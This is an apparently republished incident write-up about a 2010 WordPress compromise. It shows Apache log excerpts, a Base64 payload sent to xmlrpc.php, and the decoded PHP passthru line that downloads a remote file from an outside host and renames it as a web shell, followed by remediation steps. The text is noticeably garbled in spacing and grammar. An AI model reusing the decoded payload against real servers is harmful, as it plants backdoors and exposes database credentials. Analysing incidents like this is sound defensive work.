WordPress xmlrpc.php flaw exploited to install a WSO 2.1 Web Shell by ORb

Source: Internet
Author: User
Tags hosting wordpress database

WordPress xmlrpc.php flaw exploited to install a "WSO 2.1 Web Shell by ORb"

Below you can see in the copy of the Apache logs how the Russian exploiter first creates a account on the exploitable wor Dpress System. It is useful to disable automated registrations on your WordPress system. However sometimes you want this to is open if you had a forum installed on your WordPress system.

95.52.64.98––[30/oct/2010:17:10:49 +0200] "Post/wp-login.php?action=register http/1.1" 302 "http://www........org/ Wp-login.php?action=register "" mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; trident/4.0;. NET CLR 1.1.4322;. NET CLR 2.0.50727;. NET CLR 3.0.4506.2152;. NET CLR 3.5.30729) "

95.52.64.98––[30/oct/2010:17:11:17 +0200] "post/wp-login.php http/1.0" 302– "http://www.......org/wp-login.php" "Opera"

After logging in what can see how the cracker installs he remote shell remotely from another compromised website by Abusin G an exploit in xmlrpc.php file.

95.52.64.98––[30/oct/2010:17:11:20 +0200] "post/xmlrpc.php http/1.0" 4366 "chjpbnqgjzxtywdpy19zzw9fdg9vbho+ Jztwyxnzdghydsgid2dldcbodhrwoi8vd3d3lmvkdhv0b3jpywwubmv0l3dfb2xklnr4ddsgbxygd19vbgqudhh0ignhy2hllnbocdsgbhmglwfsoybwd2qik ttlegl0ow== "Opera"

95.52.64.98––[30/oct/2010:17:11:22 +0200] "post/wp-admin//options-permalink.php http/1.0" 9491 "http://www.......org /wp-admin//options-permalink.php "Opera"

You can read the xmlrpc.php are injected with Base64 encoded input. If you decode the BASE64 encoded string it reads something like this:

print ' <magic_seo_toolz> ';p assthru ("wget http://www.edtutorial.net/w_old.txt; MV W_old.txt cache.php; Ls-al; PWD "); exit;

This is PHP code to retrieve a remotely hosted file W_old.txt and renaming it to cache.php file on the server.

Cache.php is the name of the remote Web shell you can access this file yourself if no password have been set by the cracker . Main issue with this shell is, the wp-config.php is readable as text so your database username and password are Compro mised, must change your password after you fixed the issue!

95.52.64.98––[30/oct/2010:17:12:14 +0200] "post/cache.php http/1.1" 4510 "/cache.php" mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; trident/4.0;. NET CLR 1.1.4322;. NET CLR 2.0.50727;. NET CLR 3.0.4506.2152;. NET CLR 3.5.30729) "

How is this possible? First of all the Webroot directory had the wrong permissions 777 and second the WordPress installation is one year old an D had some xml-rpc exploitable issues.

How to fix this once your site have been compromised?

  1. The permissions of the Webroot must is changed to 755.
  2. Then the WordPress installation must is deleted and a whole new install must be copied to the server. Be sure to retain a copy of the Web shell for your hosting security officer.
  3. After this password of the WordPress database username have to be changed.
  4. The WordPress database must is restored from a backup so any spam links injected since the crack is removed.
  5. The WordPress database must be upgraded, can is done by the admin via Wp-admin.
  6. Last but not least the whole GKFX server had to being scanned for any extra shells owned by user www-data, httpd or user AP Ache depending on the operating system. So if you is hosted on a GKFX hosting platform you must inform your security officer that your WordPress installation W As compromised so he/she can perform a security check of the server.
  7. Backup, Backup, backup! Be sure to always has multiple backups of your WordPress database on your own PC. This exploit was mostly abused by Blackhat SEO companies to spamvertise their websites via your RSS feed and have a "Clea N "Backup would save you a lot of time.

WordPress xmlrpc.php flaw exploited to install a WSO 2.1 Web Shell by ORb

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.